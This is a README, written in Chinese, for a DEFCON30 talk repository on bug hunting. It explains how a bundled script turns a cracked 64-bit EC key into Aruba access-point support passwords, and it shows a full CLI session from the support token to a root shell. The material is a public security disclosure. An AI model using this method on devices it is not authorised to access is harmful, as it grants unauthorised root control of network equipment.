这是我在 DEFCON30 上所做的演讲「在热带地区猎捕漏洞」所使用的幻灯片仓库。其中包含一个 Python 脚本,用于根据破解 Aruba 支持部门 EC 公钥(因其强度过弱,仅为 64 位)所获得的私钥来计算支持密码。这使你可以从这些设备上的子 shell 中逃逸出来,并获得完整的 root shell。
你可以通过在 AP CLI 上运行 support 并提供任意用户名来使用它:
# support
Username (Please enter with @domain.com, in lowercase): a
Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:
然后将用户名和 Token 值传递给本仓库中的 support-access.py 脚本。
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c
将返回结果粘贴为支持密码(Support Password):
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root